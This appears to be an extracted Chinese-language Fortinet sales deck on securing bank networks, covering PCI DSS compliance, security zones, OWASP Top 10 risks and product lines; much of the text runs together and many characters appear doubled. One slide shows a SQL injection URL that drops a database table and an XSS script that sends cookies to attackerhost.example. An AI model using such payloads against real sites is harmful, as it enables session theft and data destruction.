金融系統(tǒng)安全解決架構(gòu)

1July,2009建設(shè)高校綠色網(wǎng)絡(luò)應(yīng)用安全架構(gòu)建設(shè)金融網(wǎng)絡(luò)應(yīng)用安全架構(gòu)2內(nèi)容安排

Fortinet安全產(chǎn)品系列5銀行應(yīng)用網(wǎng)絡(luò)安全部署2銀行網(wǎng)絡(luò)安全區(qū)域架構(gòu)分析3統(tǒng)一安全的行業(yè)技術(shù)發(fā)展方向4

1國(guó)際行業(yè)安全形勢(shì)及PCI規(guī)范

6Fortinet公司安全服務(wù)3用戶面臨的安全威脅正日益增長(zhǎng)3惡意軟件指數(shù)級(jí)的增長(zhǎng)（單位：千）美國(guó)國(guó)防部報(bào)告的惡意網(wǎng)絡(luò)行為（單位：千）HackersBreachHeartlandPaymentCreditCardSystem(1/20/2009)“HeartlandPaymentSystems(HPY)disclosedthatintrudershackedintothe

computersitusestoprocess100millionpaymentcardtransactionspermonthfor175,000merchants…”ElectricityGridinU.S.PenetratedbySpies(4/8/2009)“CyberspieshavepenetratedtheU.S.electricalgridandleftbehindsoftwareprogramsthatcouldbeusedtodisruptthesystem,accordingtocurrentandformernational-securityofficials...”U.S.SouthKoreaInvestigatePossibleNorthKoreanCyberAttack(7/8/2009)“Aseriesofcoordinatedattacksongovernmentandfinancialwebsitesstarted

aroundthesametimeNorthKoreatestednewmissilesandfacedfreshsanctions…”混合型攻擊現(xiàn)在成為主流檢測(cè)層次需要提升

性能壓力增強(qiáng)攻擊的動(dòng)機(jī)從吸引注意力轉(zhuǎn)向經(jīng)濟(jì)利益網(wǎng)絡(luò)安全的重要性越來(lái)越高4用戶的商業(yè)安全需求日益提高4企業(yè)數(shù)據(jù)中心的網(wǎng)絡(luò)吞吐量10MB100MB1GBMulti-GB10GB企業(yè)的信息安全需要遵循更多的一致性要求一致性要求既來(lái)自于政府頒布的法律法規(guī)，也會(huì)來(lái)自于行業(yè)規(guī)定或商業(yè)伙伴的要求IT預(yù)算收縮安全開(kāi)銷增加網(wǎng)絡(luò)需求正不斷加速安全需求也需要與之匹配SOX404FISMAHIPAA2009至2010年IT服務(wù)花銷變化EUDataProtectionDirective5國(guó)際化的行業(yè)數(shù)據(jù)漏洞和破壞“AtlantisResort

報(bào)告數(shù)據(jù)被偷影響了

55,000

客戶”“Marriott丟失了存有206,000個(gè)客戶個(gè)人信息的備份磁帶”“CardSystemsSolutions公司4000萬(wàn)張信用卡被破解，其中包括1390萬(wàn)張萬(wàn)事達(dá)信用卡和2200萬(wàn)張Visa信用卡“GuidanceSoftware報(bào)告有漏洞”“WellsFargoBank報(bào)告被偷的計(jì)算機(jī)上包含私人數(shù)據(jù)”“LexisNexis被黑的數(shù)據(jù)庫(kù)包含

310,000

客戶信息”“BankofAmericalooses丟失的備份磁帶內(nèi)存有1200萬(wàn)聯(lián)邦數(shù)據(jù)”數(shù)據(jù)安全漏洞還在上升...5000萬(wàn)客戶受到影響!!應(yīng)用系統(tǒng)漏洞都已經(jīng)防護(hù)了嗎?未報(bào)道的那些漏洞會(huì)怎么樣呢?這些數(shù)據(jù)為什么會(huì)受到攻擊?6FortinetConfidential

在過(guò)去3年中，數(shù)據(jù)竊取者增加了650%—CSI/FBI51%以上的破壞行為并未被告知公司中的每一名員工。

—CIO平均每起內(nèi)部攻擊導(dǎo)致的經(jīng)濟(jì)損失為270萬(wàn)美元。

—CSI/FBI調(diào)查報(bào)告20%以上的金融公司都遭受過(guò)數(shù)據(jù)破壞行為。

—EvansDataCorp金融行業(yè)信息安全威脅的現(xiàn)狀78%以上攻擊者都是授權(quán)用戶：如公司員工、設(shè)備或第三方服務(wù)提供商等。-CERT/SecretService7完善的安全防御覆蓋能力（數(shù)據(jù)安全，傳輸安全，內(nèi)容安全等）動(dòng)態(tài)安全的服務(wù)能力（自動(dòng)適應(yīng)性更新）

行業(yè)IT安全法規(guī)的遵從（PCI，CISP，SOX,FSA等）減少IT安全風(fēng)險(xiǎn)，降低IT管理資源穩(wěn)定的性能和高效運(yùn)營(yíng)能力簡(jiǎn)單的部署方式和靈活的網(wǎng)絡(luò)適應(yīng)性完整的產(chǎn)品部署解決方案和未來(lái)平滑升級(jí)支持國(guó)際金融行業(yè)IT安全建設(shè)重點(diǎn)動(dòng)態(tài)威脅安全防御能力良好的投資回報(bào)性能復(fù)合型安全效能回報(bào)

降低TCO總體投入和維護(hù)成本保護(hù)綠色能源遵從綠色能源消耗優(yōu)化物理空間節(jié)約業(yè)務(wù)穩(wěn)定性保持8國(guó)際金融行業(yè)IT安全規(guī)范PCI成立于2004年12月，由5家最頂尖的信用卡行業(yè)組織發(fā)起發(fā)布了PCIDSS，使各企業(yè)自有的安全策略保持一致標(biāo)準(zhǔn)制定是為了確保在企業(yè)存儲(chǔ)、處理、傳輸持卡人數(shù)據(jù)時(shí)，應(yīng)滿足最低級(jí)別的安全風(fēng)險(xiǎn)金融處理信用卡信息時(shí)，必須遵從新的PCI標(biāo)準(zhǔn)2008年10月發(fā)布1.2版本建立從網(wǎng)絡(luò)層，內(nèi)容層到應(yīng)用層的體系安全結(jié)構(gòu)強(qiáng)調(diào)防范常見(jiàn)的編碼漏洞，特別是OWASP（開(kāi)放的web業(yè)務(wù)服務(wù)安全組織）中定義的漏洞編碼檢查或確保在公開(kāi)的Web應(yīng)用前部署Web應(yīng)用防火墻，以檢測(cè)并阻止基于Web的攻擊。

增強(qiáng)合規(guī)企業(yè)的信譽(yù)，降低安全風(fēng)險(xiǎn)，是現(xiàn)代金融企業(yè)安全標(biāo)準(zhǔn)Fortinet是PCI安全標(biāo)準(zhǔn)委員會(huì)的成員之一(2009年10月6日)99CISP/PCI安全規(guī)范遵從方案PCI數(shù)據(jù)安全標(biāo)準(zhǔn)描述Fortinet解決方案構(gòu)建并維護(hù)安全網(wǎng)絡(luò)安裝并維護(hù)防火墻配置以保護(hù)持卡人數(shù)據(jù)不使用供應(yīng)商缺省設(shè)置的系統(tǒng)密碼和其他安全參數(shù)FortiGate集成的防火墻功能FortiDB漏洞評(píng)估管理和審計(jì)保護(hù)持卡人數(shù)據(jù)保護(hù)存儲(chǔ)的持卡人數(shù)據(jù)加密通過(guò)公共網(wǎng)絡(luò)傳輸?shù)某挚ㄈ藬?shù)據(jù)和敏感性信息FortiGate集成的VPN功能FortiWebweb應(yīng)用安全網(wǎng)關(guān)維護(hù)漏洞管理計(jì)劃使用反病毒軟件并定期更新開(kāi)發(fā)、維護(hù)安全系統(tǒng)和應(yīng)用程序FortiGate集成病毒網(wǎng)關(guān)FortiClient桌面反病毒FortiDB數(shù)據(jù)庫(kù)漏洞管理和審計(jì)Fortinet具有成本效益的金融機(jī)構(gòu)類產(chǎn)品幫助金融機(jī)構(gòu)匹配和維持CISP/PCI法規(guī)1010PCI數(shù)據(jù)安全標(biāo)準(zhǔn)描述Fortinet解決方案實(shí)施可靠的訪問(wèn)控制措施只有具備業(yè)務(wù)需求的人才能訪問(wèn)持卡人數(shù)據(jù)為每位擁有計(jì)算機(jī)訪問(wèn)權(quán)限的用戶分配唯一的ID嚴(yán)格限制對(duì)持卡人數(shù)據(jù)的物理訪問(wèn)FortiGate

安全用戶認(rèn)證授權(quán)FortiDB數(shù)據(jù)庫(kù)權(quán)限審計(jì)定期監(jiān)控和測(cè)試網(wǎng)絡(luò)跟蹤和監(jiān)控訪問(wèn)網(wǎng)絡(luò)資源和持卡人數(shù)據(jù)的所有操作定期測(cè)試安全系統(tǒng)和流程FortiAnalyzer

網(wǎng)絡(luò)日志報(bào)告審計(jì)，F(xiàn)ortiDB漏洞評(píng)估掃描和審計(jì)維護(hù)信息安全策略維護(hù)針對(duì)信息安全的策略FortiManager

集中管理設(shè)備Fortinet具有成本效益的金融機(jī)構(gòu)類產(chǎn)品幫助金融機(jī)構(gòu)匹配和維持CISP/PCI法規(guī)CISP/PCI安全規(guī)范遵從方案11FortinetConfidental保密文件11現(xiàn)代金融系統(tǒng)三維安全架構(gòu)特點(diǎn)VPN數(shù)據(jù)加密VPN提供了數(shù)據(jù)安全加密和傳輸通道

網(wǎng)絡(luò)防火墻防火墻提供了網(wǎng)絡(luò)層區(qū)域威脅防御體系

防病毒網(wǎng)關(guān)/DLP

檢測(cè)/阻止病毒/木馬和惡意代碼安全信息泄漏保護(hù)IPS入侵防御IDC網(wǎng)絡(luò)服務(wù)器系統(tǒng)監(jiān)控網(wǎng)絡(luò)行為和系統(tǒng)安全警告

Web前置安全檢測(cè)Web接口應(yīng)用的滲透性不規(guī)范訪問(wèn)安全

數(shù)據(jù)庫(kù)安全業(yè)務(wù)后臺(tái)數(shù)據(jù)安全評(píng)估和訪問(wèn)安全審計(jì)業(yè)務(wù)應(yīng)用安全網(wǎng)絡(luò)連接安全系統(tǒng)內(nèi)容安全12網(wǎng)絡(luò)應(yīng)用的變化Page12|

Collaboration/Media

防火墻只基于網(wǎng)絡(luò)和端口的檢測(cè)的脆弱性問(wèn)題…新型應(yīng)用的發(fā)展逐漸多樣化Ports≠ApplicationsIPAddresses

≠

UsersProblem:ITCan’tSafelyEnableInternetApplicationsSaaSPersonal安全威脅從網(wǎng)絡(luò)層擴(kuò)展到應(yīng)用層13從戰(zhàn)略發(fā)展角度來(lái)考慮IT安全建設(shè)問(wèn)題？面向未來(lái)考慮您的安全基礎(chǔ)構(gòu)架先于威脅的變化立體安全威脅的自動(dòng)化更新防御建立統(tǒng)一鞏固的安全體系，而非逐點(diǎn)式部署降低復(fù)雜性增強(qiáng)保護(hù)能力減少風(fēng)險(xiǎn)降低資本性支出和運(yùn)營(yíng)成本從系統(tǒng)結(jié)構(gòu)角度部署應(yīng)對(duì)安全威脅到2010年為止，只有10%

的安全威脅會(huì)被單一功能安全產(chǎn)品發(fā)現(xiàn)，而在2005年這個(gè)數(shù)字還是80%。

Source:Gartner““*Gartner:CostCuttingWhileImprovingITSecurity,March20,200814安全的復(fù)雜技術(shù)考慮防火墻安全管理安全監(jiān)控系統(tǒng)攻擊IPS病毒/蠕蟲(chóng)數(shù)據(jù)泄漏網(wǎng)站過(guò)濾數(shù)據(jù)加密傳輸郵件安全應(yīng)用控制三層路由廣域傳輸優(yōu)化15Fortinet提供戰(zhàn)略性安全服務(wù)綜合安全解決方案集成的戰(zhàn)略安全結(jié)構(gòu)統(tǒng)一的安全威脅管理更低的TCO降低復(fù)雜性和管理難度簡(jiǎn)化實(shí)施和配置實(shí)時(shí)安全防御

24×7全球安全更新集中云式服務(wù)體系靈活部署

適應(yīng)客戶的時(shí)間表和預(yù)算基于客戶的特性服務(wù)16第三方系統(tǒng)內(nèi)部數(shù)據(jù)交換區(qū)EAI,UDI,CCIWeb前置機(jī)業(yè)務(wù)應(yīng)用系統(tǒng)數(shù)據(jù)庫(kù)系統(tǒng)業(yè)務(wù)管理數(shù)據(jù)庫(kù)應(yīng)用平臺(tái)集中管理和審計(jì)安全分析DNSSMTPFTPProxy集中管理區(qū)內(nèi)網(wǎng)應(yīng)用和數(shù)據(jù)區(qū)OCRM,BDBWeb前置機(jī)業(yè)務(wù)應(yīng)用服務(wù)器數(shù)據(jù)庫(kù)系統(tǒng)網(wǎng)銀服務(wù)器系統(tǒng)公共E-Banking系統(tǒng)OA辦公區(qū)核心區(qū)互聯(lián)網(wǎng)區(qū)銀行業(yè)務(wù)局域網(wǎng)區(qū)域安全區(qū)結(jié)構(gòu)internet17OA辦公區(qū)網(wǎng)管區(qū)域內(nèi)部業(yè)務(wù)區(qū)電子銀行業(yè)務(wù)區(qū)企業(yè)客戶寬帶家庭用戶惡意訪問(wèn)移動(dòng)用戶InternetIntranet銀行業(yè)務(wù)廣域網(wǎng)區(qū)域安全區(qū)結(jié)構(gòu)18內(nèi)部用戶訪問(wèn)外網(wǎng)的策略控制問(wèn)題內(nèi)部用戶安全區(qū)域間的訪問(wèn)隔離需要內(nèi)部用戶訪問(wèn)internet的病毒/色情網(wǎng)頁(yè)問(wèn)題內(nèi)部用戶多線程應(yīng)用程序的帶寬耗盡問(wèn)題平衡單用戶的流量均衡問(wèn)題內(nèi)部用戶上網(wǎng)的安全審計(jì)問(wèn)題用戶主機(jī)的僵尸網(wǎng)絡(luò)感染問(wèn)題用戶主機(jī)的非主動(dòng)性垃圾流量會(huì)話攻擊問(wèn)題基于用戶帳號(hào)的授權(quán)策略問(wèn)題病毒/蠕蟲(chóng)防火墻安全監(jiān)控

OA辦公網(wǎng)絡(luò)的威脅分析Web過(guò)濾郵件過(guò)濾混合型威脅及新應(yīng)用帶來(lái)的問(wèn)題總部惡意網(wǎng)頁(yè)蠕蟲(chóng)病毒間諜軟件

P2P、IM應(yīng)用垃圾郵件網(wǎng)頁(yè)欺騙木馬軟件……DMZ服務(wù)器區(qū)internet20OA辦公網(wǎng)安全部署internetICSA國(guó)際計(jì)算機(jī)組織認(rèn)證防病毒網(wǎng)關(guān)22多協(xié)議檢測(cè)方式企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁(yè)/郵件/文件傳誦/聊天公共網(wǎng)絡(luò)資源互連網(wǎng)

01010101010101010010111011高性能的芯片加速防病毒引擎FortiASIC-CP

(內(nèi)容處理器)特征匹配防病毒IPS內(nèi)容過(guò)濾加密解密VPN協(xié)商密鑰維護(hù)FortiASIC-NP

(網(wǎng)絡(luò)處理器)高速包轉(zhuǎn)發(fā)線速防火墻IPSecVPNNAT防DoS攻擊流量整形Source: FortiGuardPrevalenceReport, 30daysTop10MalwareinCanadathroughApril21,2007全球部署的安全監(jiān)控制體系VB100病毒安全掃描認(rèn)證26外聯(lián)業(yè)務(wù)的對(duì)象策略控制問(wèn)題外聯(lián)業(yè)務(wù)的安全傳輸問(wèn)題外聯(lián)流量的系統(tǒng)層威脅問(wèn)題外聯(lián)流量的惡意垃圾擁塞問(wèn)題外聯(lián)業(yè)務(wù)的數(shù)據(jù)流傳輸優(yōu)化問(wèn)題外聯(lián)業(yè)務(wù)的虛擬化通道隔離業(yè)務(wù)流量中的蠕蟲(chóng)/木馬入侵式威脅業(yè)務(wù)流量監(jiān)控系統(tǒng)攻擊IPS病毒/蠕蟲(chóng)防火墻安全監(jiān)控外聯(lián)業(yè)務(wù)網(wǎng)絡(luò)的威脅分析傳輸優(yōu)化數(shù)據(jù)加密27外聯(lián)業(yè)務(wù)虛擬安全隧道部署Intranet分支銀行分支銀行營(yíng)業(yè)所營(yíng)業(yè)所業(yè)務(wù)虛擬安全隧道接入28網(wǎng)銀業(yè)務(wù)的安全分析Web應(yīng)用是業(yè)務(wù)的主要平臺(tái)49%的Web應(yīng)用包含高風(fēng)險(xiǎn)級(jí)別的漏洞，很容易被自動(dòng)工具探測(cè)攻擊80%-96%的Web應(yīng)用包含有易被黑客攻擊的漏洞99%的Web應(yīng)用不合乎PCIDSS規(guī)范現(xiàn)有的網(wǎng)絡(luò)層檢測(cè)技術(shù)不能防范大多數(shù)常見(jiàn)的漏洞攻擊跨站腳本

SQL注入信息泄漏HTTP回應(yīng)截?cái)喙舻纳虡I(yè)影響：減少收入–每丟失一條記錄損失$300不合規(guī)的處罰損害企業(yè)聲譽(yù)基于web交互界面入侵后臺(tái)數(shù)據(jù)庫(kù)系統(tǒng)是目前主流的威脅方式國(guó)際行業(yè)專業(yè)組織OWASP/Webappsec專注于web應(yīng)用安全的分析29Web應(yīng)用安全威脅分析最流行的威脅類型最常見(jiàn)的應(yīng)用弱點(diǎn)(/projects/statistics/)

Slide293080端口HTTP請(qǐng)求http://XX.XX.XX.XXX/web/n2/productview.asp?id=97;drop%20table%20Card_kevin交換機(jī)防火墻Web服務(wù)器DB數(shù)據(jù)庫(kù)Select*fromproductwhereid=97Droptablecard_kevin命令已執(zhí)行成功<SCRIPT>Document.location=‘http://attackerhost.example/cg-bin/

getcookie.cgi?’+document.cookie</SCRIPT>跨站腳本/SQL注入式攻擊Intranet31OWASP開(kāi)放web應(yīng)用服務(wù)安全組織漏洞描述A1-跨站腳本CrossSiteScripting(XSS) 當(dāng)應(yīng)用程序提取用戶提供的數(shù)據(jù)并發(fā)送到Web瀏覽器，數(shù)據(jù)內(nèi)容沒(méi)有先經(jīng)過(guò)驗(yàn)證或編碼時(shí)，可能出現(xiàn)的XSS漏洞。XSS允許攻擊者在受害者的瀏覽器上執(zhí)行腳本，腳本可能會(huì)劫持用戶會(huì)話、破壞Web站點(diǎn)或引入蠕蟲(chóng)等。A2–注入攻擊InjectionFlaws注入漏洞，特別是SQL注入，通過(guò)在Web應(yīng)用程序內(nèi)。當(dāng)用戶提供的數(shù)據(jù)作為命令或查詢的一部分被發(fā)送到解釋器時(shí)，可能出現(xiàn)注入漏洞。攻擊者的惡意數(shù)據(jù)欺騙翻譯器執(zhí)行非用戶本意的命令或改變數(shù)據(jù)。A3–惡意文件執(zhí)行MaliciousFileExecution遠(yuǎn)程文件包含(RFI)代碼缺陷允許攻擊者包含惡意代碼和數(shù)據(jù)，導(dǎo)致破壞性的攻擊，如全部服務(wù)器被攻陷。惡意文件執(zhí)行攻擊會(huì)影響PHP、XML以及任意從用戶接收文件名或文件的架構(gòu)。A4–不安全的直接對(duì)象引用InsecureDirectObjectReference當(dāng)開(kāi)發(fā)人員把一個(gè)引用暴露給內(nèi)部執(zhí)行對(duì)象時(shí)，如一個(gè)文件、目錄、數(shù)據(jù)庫(kù)記錄或鍵值、URL或格式參數(shù)，可能發(fā)生直接對(duì)象引用。攻擊者可以操縱這些引用訪問(wèn)其它未經(jīng)認(rèn)證的對(duì)象。A5–跨站請(qǐng)求偽造CrossSiteRequestForgery(CSRF)CSRF攻擊強(qiáng)制登錄用戶的瀏覽器發(fā)送經(jīng)過(guò)預(yù)先認(rèn)證的請(qǐng)求到一個(gè)有漏洞的Web應(yīng)用程序，接著強(qiáng)制受害者的瀏覽器執(zhí)行一個(gè)對(duì)攻擊者有利的惡意行為。CSRF能和它所攻擊的Web應(yīng)用程序一樣有效。A6–信息泄漏及不正確的錯(cuò)誤操作InformationLeakageandImproperErrorHandling應(yīng)用程序可能通過(guò)各種應(yīng)用程序問(wèn)題非用戶本意的泄漏配置、內(nèi)部結(jié)構(gòu)或隱私等信息。攻擊者利用這個(gè)弱點(diǎn)偷竊敏感數(shù)據(jù)或傳入更多嚴(yán)重的攻擊。A7–失效認(rèn)證及會(huì)話管理BrokenAuthenticationandSessionManagement信任賬戶及會(huì)話令牌通過(guò)沒(méi)有被完全的保護(hù)。攻擊者使用密碼、密鑰或認(rèn)證令牌偽裝其它用戶的身份。A8–不安全的密碼存儲(chǔ)InsecureCryptographicStorageWeb應(yīng)用程序很少能適當(dāng)?shù)氖褂妹艽a功能來(lái)保護(hù)數(shù)據(jù)和credential。攻擊者通過(guò)缺乏有效保護(hù)的數(shù)據(jù)來(lái)竊取身份及其它犯罪行為，如信用卡欺詐。A9–不安全的通信InsecureCommunications敏感數(shù)據(jù)需要被保護(hù)，而應(yīng)用程序經(jīng)常沒(méi)有對(duì)網(wǎng)絡(luò)流量進(jìn)行加密。A10–限制URL訪問(wèn)失效FailuretoRestrictURLAccess通常，應(yīng)用程序只能通過(guò)對(duì)非認(rèn)證用戶鏈拉或URL的顯示來(lái)保護(hù)敏感功能。攻擊者能利用這個(gè)弱點(diǎn)，通過(guò)直接訪問(wèn)URL來(lái)訪問(wèn)并執(zhí)行未授權(quán)的操作。32后臺(tái)數(shù)據(jù)庫(kù)的安全與規(guī)范目標(biāo)數(shù)據(jù)庫(kù)與利潤(rùn)相關(guān)的特定目標(biāo)數(shù)據(jù)大量的經(jīng)由互聯(lián)網(wǎng)和應(yīng)用程序的訪問(wèn)整合度越大，體現(xiàn)出的價(jià)值越大數(shù)據(jù)庫(kù)數(shù)據(jù)遭到破壞而導(dǎo)致的損失接近每條$200*檢測(cè)/擴(kuò)大，通告，商業(yè)損失2005-2007，有將近1億5000萬(wàn)的數(shù)據(jù)庫(kù)數(shù)據(jù)記錄丟失來(lái)自于內(nèi)部人員的安全威脅只保障邊界網(wǎng)絡(luò)安全是不夠的高權(quán)限用戶引起的安全威脅占78%*，職責(zé)分離*來(lái)源:Ponemon研究所33內(nèi)部用戶合法權(quán)限濫用權(quán)限盜用越權(quán)濫用權(quán)限分配不當(dāng)臨時(shí)帳號(hào)未及時(shí)清理備份數(shù)據(jù)缺乏保護(hù)離職員工的后門(mén)合作伙伴合法權(quán)限濫用權(quán)限盜用越權(quán)濫用后門(mén)程序DB2/SQL/Oracle/Sybase數(shù)據(jù)庫(kù)軟件數(shù)據(jù)庫(kù)平臺(tái)漏洞通訊協(xié)議漏洞弱鑒權(quán)機(jī)制日志缺失或不完整

4W：-是誰(shuí)，做了什么-什么時(shí)候，在哪里跟蹤：-登錄-數(shù)據(jù)/文件訪問(wèn)-數(shù)據(jù)/文件變化-模式變化-日志竄改-人為錯(cuò)誤-可疑的活動(dòng)-自定義事件數(shù)據(jù)庫(kù)安全審計(jì)規(guī)范34網(wǎng)銀服務(wù)區(qū)安全部署外部用戶網(wǎng)銀服務(wù)器數(shù)據(jù)庫(kù)/LDAP服務(wù)器Web門(mén)戶系統(tǒng)Web安全防護(hù)設(shè)備InternetIntranet數(shù)據(jù)庫(kù)監(jiān)控設(shè)備Web注入攻擊數(shù)據(jù)庫(kù)攻擊數(shù)據(jù)庫(kù)攻擊Web應(yīng)用安全檢測(cè)XML內(nèi)容語(yǔ)言檢測(cè)SSL/XML加速Web負(fù)載均衡專業(yè)硬件芯片技術(shù)多種應(yīng)用簽名技術(shù)漏洞掃描監(jiān)控與審計(jì)支持多種數(shù)據(jù)庫(kù)安全補(bǔ)救措施建議跟蹤軌跡預(yù)配置報(bào)告類型Web安全數(shù)據(jù)庫(kù)安全I(xiàn)nteret35圖形報(bào)告攻擊審計(jì)日志36虛擬化業(yè)務(wù)服務(wù)器群安全分析固定對(duì)象和應(yīng)用訪問(wèn)的策略控制問(wèn)題訪問(wèn)會(huì)話的攻擊性泛濫壓力拒絕服務(wù)的資源性攻擊壓力系統(tǒng)層弱點(diǎn)探測(cè)攻擊的問(wèn)題基于訪問(wèn)者的流量控制問(wèn)題畸形數(shù)據(jù)包重組的協(xié)議層壓力業(yè)務(wù)的長(zhǎng)連接保持問(wèn)題虛擬化安全策略配置問(wèn)題蠕蟲(chóng)/木馬入侵式威脅系統(tǒng)攻擊IPS病毒/蠕蟲(chóng)防火墻安全監(jiān)控37虛擬化業(yè)務(wù)服務(wù)器集群虛擬業(yè)務(wù)服務(wù)區(qū)一防火墻虛擬策略工作模式安全配置:AV安全配置:AS安全配置:WCF安全配置;IPS路由業(yè)務(wù)安全策略組安全配置:TS安全審計(jì)策略組業(yè)務(wù)服務(wù)器集群區(qū)安全部署核心交換機(jī)安全網(wǎng)關(guān)安全網(wǎng)關(guān)核心交換機(jī)InternetIntranet38統(tǒng)一安全管理監(jiān)控系統(tǒng)

分支銀行

分支銀行

移動(dòng)用戶

IntranetInternetOA辦公區(qū)網(wǎng)管區(qū)域內(nèi)部業(yè)務(wù)區(qū)電子銀行業(yè)務(wù)區(qū)安全掃描管理審計(jì)39安全集中統(tǒng)計(jì)報(bào)表超過(guò)300個(gè)報(bào)表模版報(bào)表設(shè)置向?qū)?bào)表完全可定制報(bào)表示例事件/攻擊基于:

設(shè)備

來(lái)源

類別

威脅名稱

協(xié)議郵件使用率Web使用率帶寬使用率協(xié)議使用率

40安全集中監(jiān)控中心41Fortinet公司概況全球領(lǐng)先的專業(yè)整合安全技術(shù)提供商專業(yè)網(wǎng)絡(luò)安全廠商2000年成立1200+名員工/超過(guò)500+工程發(fā)展最快的專業(yè)安全公司全球化的銷售服務(wù)體系(美國(guó)，歐洲，亞洲)華爾街業(yè)績(jī)?cè)鲩L(zhǎng)最好的公司之一FTNT(IPO)權(quán)威的安全認(rèn)證6項(xiàng)ICSA(計(jì)算機(jī)安全實(shí)驗(yàn)室）認(rèn)證最高級(jí)政府安全認(rèn)證(FIPS-2,

CommonCriteriaEAL4+)100+安全行業(yè)認(rèn)證ISO9001認(rèn)證美國(guó)病毒專業(yè)評(píng)測(cè)試VB100認(rèn)證

歐洲專業(yè)IPS安全評(píng)測(cè)NSS認(rèn)證Frost&Sullivan/IDC全球最大的整合性安全廠家42為全球運(yùn)營(yíng)商提供增值安全服務(wù)43金融行業(yè)客戶4444安全市場(chǎng)分額報(bào)告IDCQuarterlyApplianceTracker,June2009(basedonrevenues)Gartner,Inc.,“1H09MultiFunctionFirewallMagicQuadrant”byG.YoungandA.Hils,JuneX,2009.2007Frost&SullivanAwardfor“MarketLeadershipinUTM”and“GlobalCompetitiveStrategyLeadershipoftheYear"SourceIDC報(bào)告整合性安全市場(chǎng)

Gartner報(bào)告多功能防火墻市場(chǎng)Frost&Sullivan報(bào)告整合性安全市場(chǎng)45全球整合性安全市場(chǎng)的發(fā)展趨勢(shì)45

2008 2009 2010 2011 2012 2013Firewall&VPNUTM(-0.5%)CAGR$2.2$2.1$inbillions13.8%CAGR$1.7$3.2Source:IDC“WorldwideNetworkSecurity2008-2012Forecastand2007VendorShares:Transitions–AppliancesAreMoreThanMeetstheEye”46國(guó)內(nèi)UTM整合性安全市場(chǎng)的發(fā)展47Fortinet統(tǒng)一網(wǎng)絡(luò)安全解決方案

應(yīng)用層安全FortiGate七層UTM安全網(wǎng)關(guān)安全云服務(wù)FortiGuard實(shí)時(shí)安全云服務(wù)網(wǎng)絡(luò)FortiMail郵件交付安全FortiWebWeb服務(wù)安全主機(jī)訪問(wèn)安全FortiClient主機(jī)安全FortiScan資產(chǎn)安全管理FortiDB數(shù)據(jù)安全審計(jì)

邊界網(wǎng)關(guān)安全數(shù)據(jù)庫(kù)安全FortiManager集中安全管理FortiAnalyzer集中安全審計(jì)統(tǒng)一安全管理48旗艦產(chǎn)品：FortiGate安全網(wǎng)關(guān)系列平臺(tái)遠(yuǎn)程分支桌面級(jí)中低端產(chǎn)品線中高端產(chǎn)品線高端產(chǎn)品線FG5000FG30B-80CMFG110C-620BFG5000

FG1240B-3810A反垃圾郵件應(yīng)用控制防火墻流量控制VPN防病毒IPSWeb過(guò)濾SSL加速DLPWAN優(yōu)化無(wú)線支持NAC終端控制49技術(shù)特點(diǎn)：分布式安全到集中式管理的演變49Fortinet解決方案?jìng)鹘y(tǒng)分布式安全設(shè)計(jì)集中式的部署和管理，專用硬件設(shè)計(jì)結(jié)構(gòu)，一站式安全防御技術(shù)TCO成本投入低，安全效能高易于部署和維護(hù)，符合綠色I(xiàn)T建設(shè)規(guī)范安全產(chǎn)品分類過(guò)多，管理繁瑣

安全防御效果差，安全問(wèn)題難于定位總體投資成本過(guò)高產(chǎn)品部署和維護(hù)對(duì)當(dāng)前網(wǎng)絡(luò)影響明顯50

技術(shù)特點(diǎn)：為IT網(wǎng)絡(luò)提供一站式安全防御50“危險(xiǎn)的”視頻鏈接：重定向至惡意網(wǎng)站W(wǎng)eb過(guò)濾阻擋對(duì)惡意網(wǎng)站的訪問(wèn)網(wǎng)絡(luò)防病毒阻止病毒下載入侵防御阻止蠕蟲(chóng)的傳播FIREWALL

主機(jī)感染后外部散播在系統(tǒng)中不斷復(fù)制自身，并試圖擴(kuò)散WEBFILTERINGANTIVIRUS“惡意”文件滲透：下載惡意文件INTRUSIONPROTECTION

PORT80一站攔截多樣化安全威脅應(yīng)用層防火墻安全過(guò)濾不同應(yīng)用51

產(chǎn)品硬件結(jié)構(gòu)特色：NP+ASIC52業(yè)界UTM安全網(wǎng)關(guān)的功能比較52PartnerSuppliedInternallyDevelopedNotavailable53業(yè)界UTM安全網(wǎng)關(guān)的業(yè)界認(rèn)證比較53SomeproductsarecertifiedPassedCertificationnotconducted54FortiGateUTM安全網(wǎng)關(guān)功能概述防火墻/VPN策略控制模塊集中安全策略管理/日志報(bào)表審計(jì)平臺(tái)FortiManager/FortiAnalyzer病毒/垃圾郵件/攻擊庫(kù)/web庫(kù)升級(jí)中心DOS/IPS系統(tǒng)攻擊保護(hù)模塊病毒/間諜軟件/蠕蟲(chóng)安全模塊垃圾郵件保護(hù)模塊IM/P2P應(yīng)用控制模塊網(wǎng)頁(yè)過(guò)濾安全

模塊

廣域網(wǎng)加速模塊DLP數(shù)據(jù)弱點(diǎn)保護(hù)55多種語(yǔ)言的web管理設(shè)計(jì)符合IT管理規(guī)范5556安全模塊:策略配置企業(yè)網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)資源公共網(wǎng)絡(luò)個(gè)體互連網(wǎng)57認(rèn)證模塊:靈活的用戶認(rèn)證ClientSTOP!用戶訪問(wèn)服務(wù)器資源時(shí)，先進(jìn)行認(rèn)證，輸入正確的用戶名密碼才可以繼續(xù)訪問(wèn)管理員進(jìn)行服務(wù)器管理員工訪問(wèn)辦公系統(tǒng)合作伙伴訪問(wèn)相應(yīng)資源對(duì)不同用戶設(shè)置不同的訪問(wèn)權(quán)限支持認(rèn)證方式本地、Radius、LDAP、SecurID、WindowsAD、PKI證書(shū)58安全模塊:病毒防御應(yīng)用企業(yè)網(wǎng)絡(luò)資源網(wǎng)頁(yè)/郵件/文件傳誦/聊天公共網(wǎng)絡(luò)資源互連網(wǎng)高性能的ASIC芯片硬件加速防病毒引擎FortiASIC-CP

(內(nèi)容處理器)特征匹配防病毒IPS內(nèi)容過(guò)濾加密解密VPN協(xié)商密鑰維護(hù)FortiASIC-NP

